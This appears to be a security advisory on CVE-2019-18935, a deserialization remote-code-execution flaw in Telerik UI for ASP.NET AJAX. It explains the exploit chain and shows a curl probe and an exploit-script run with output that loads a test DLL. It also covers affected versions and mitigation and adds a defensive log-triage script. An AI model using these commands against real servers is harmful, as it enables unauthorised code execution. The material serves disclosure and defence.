Summary:
In early May 2020, an exploit appeared in the wild that chains two CVEs to perform insecure deserialization against a product from the vendor Telerik. The vulnerability lies in Telerik UI for ASP.NET AJAX, a suite of UI components for web applications. Insecure deserialization of JSON objects results in arbitrary remote code execution on the software's host, so this is a Microsoft Windows exploit. The chain combines an unrestricted file upload vulnerability (CVE-2017-11317), the deserialization vulnerability itself (CVE-2019-18935), and mixed mode assemblies.
Description:
A file handler named RadAsyncUpload in Telerik UI for ASP.NET AJAX is the main component of this exploit; it enables uploading files asynchronously, i.e., without reloading the page.
The file-handling configuration is carried in Telerik's encrypted rauPostData POST parameter, which contains a serialized object. Anyone able to break the encryption protecting the configuration object in rauPostData could:
- Modify the type of the object in rauPostData, allowing them to control the object’s behavior while it’s being deserialized. This issue (CVE-2019-18935) is the main subject of this post.
- The rauPostData contains both the serialized configuration object and the object’s type. AsyncUploadHandler uses the type specified within rauPostData to prepare .NET’s Deserialize() method to properly deserialize the object.
An attacker would likely manipulate the Telerik.Web.UI.AsyncUploadConfiguration type within rauPostData and send an upload POST request specifying the type of an RCE gadget. Having uploaded a malicious mixed mode assembly DLL this way, the attacker sends a second request that forces JavaScriptSerializer to deserialize an object of type System.Configuration.Install.AssemblyInstaller. When deserialized, this causes the application to load the malicious DLL into its current application domain. As long as the mixed mode assembly DLL has the same architecture as the loading process, its entry-point function DllMain() is called when the DLL is loaded.
Before attempting to exploit Telerik UI for ASP.NET AJAX, confirm first that the file upload handler is registered:
*****************************************************************************
curl -sk <HOST>/Telerik.Web.UI.WebResource.axd?type=rau
{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }
*****************************************************************************
In preparing to fully compromise a remote host with a reverse shell, one can initially verify the deserialization vulnerability by uploading and loading a simple mixed mode assembly DLL that causes the web application to sleep for 10 seconds. A simple program, sleep.c, will do just that.
The exploit script leverages the core RadAsyncUpload encryption logic provided by RAU_crypto.py to craft an encrypted rauPostData POST parameter; this enables access to the vulnerable AsyncUploadHandler class through which we can upload files and deserialize arbitrary object types. This script also ensures that each uploaded file has a unique name on disk.
**************************************************************************
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{'fileInfo': {'ContentLength': 75264,
'ContentType': 'application/octet-stream',
'DateJson': '1970-01-01T00:00:00.000Z',
'FileName': '1576142987.918625.dll',
'Index': 0},
'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
'Telerik.Web.UI, Version=<VERSION>, '
'Culture=neutral, '
'PublicKeyToken=<TOKEN>',
'TempFileName': '1576142987.918625.dll'}}
[*] Triggering deserialization...
<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...
[*] Response time: 13.01 seconds
**************************************************************************
Affected Products:
Telerik UI for ASP.NET AJAX Q1 2011 (2011.1.315) to R3 2019 (2019.3.917)
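A defender-side triage helper for the facts above, added here as an example and not part of the original post or of the exploit tooling: it checks a Telerik.Web.UI assembly version string against the affected range, and lists IIS log entries that reached the RadAsyncUpload handler, rating a slow POST that ended in a 500 as high because that is the pattern the sleep payload leaves. The IIS field order and the log lines are constructed assumptions.

```python
import re
from typing import List, Tuple

# Affected range stated above: Q1 2011 (2011.1.315) through R3 2019 (2019.3.917), inclusive.
AFFECTED_MIN = (2011, 1, 315)
AFFECTED_MAX = (2019, 3, 917)


def parse_telerik_version(assembly_name: str) -> Tuple[int, int, int]:
    """Extract (year, release, build) from an assembly-qualified name such as
    'Telerik.Web.UI, Version=2019.3.917.45, Culture=neutral, PublicKeyToken=...'."""
    m = re.search(r"Version=(\d{4})\.(\d+)\.(\d+)", assembly_name)
    if not m:
        raise ValueError("no Telerik version in: " + assembly_name)
    year, release, build = (int(g) for g in m.groups())
    return (year, release, build)


def is_affected(version: Tuple[int, int, int]) -> bool:
    """True when the build falls inside the affected range; tuples compare element-wise."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


# Constructed sample of IIS W3C log lines (assumed field order:
# date time cs-method cs-uri-stem cs-uri-query sc-status time-taken in ms).
SAMPLE_LOG = """\
2020-05-04 10:01:02 GET /Telerik.Web.UI.WebResource.axd type=rau 200 12
2020-05-04 10:01:09 POST /Telerik.Web.UI.WebResource.axd type=rau 200 143
2020-05-04 10:01:11 POST /Telerik.Web.UI.WebResource.axd type=rau 500 13010
2020-05-04 10:02:00 GET /Default.aspx - 200 5
"""


def triage_rau_requests(log_text: str) -> List[dict]:
    """One record per request that reached the RadAsyncUpload handler.
    A POST answered with a 500 after a long delay matches what the sleep
    payload produces (runtime error, ~13 s response) and is rated 'high';
    other handler hits are 'review', since ordinary uploads land here too."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        day, clock, method, stem, query, status, taken = parts
        if not stem.lower().endswith("telerik.web.ui.webresource.axd") or "type=rau" not in query.lower():
            continue
        slow_error = method == "POST" and status == "500" and int(taken) >= 10000
        findings.append({"when": day + " " + clock, "method": method, "status": status,
                         "ms": int(taken), "rating": "high" if slow_error else "review"})
    return findings
```

Run the version check against the assembly name shown in the metaData block of a captured request, and the log triage against the IIS logs of the site that serves Telerik.Web.UI.WebResource.axd.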
Advisory:
https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization
Mitigation:
Telerik has released a patch for CVE-2019-18935.
Qualys customers can scan their network with QID 372327 to detect vulnerable assets. Continue to follow Qualys Threat Protection for more coverage of vulnerabilities.
References and Sources:
- https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui
- https://www.telerik.com/forums/asyncuploader-issue
- https://github.com/noperator/CVE-2019-18935/tree/master/RAU_crypto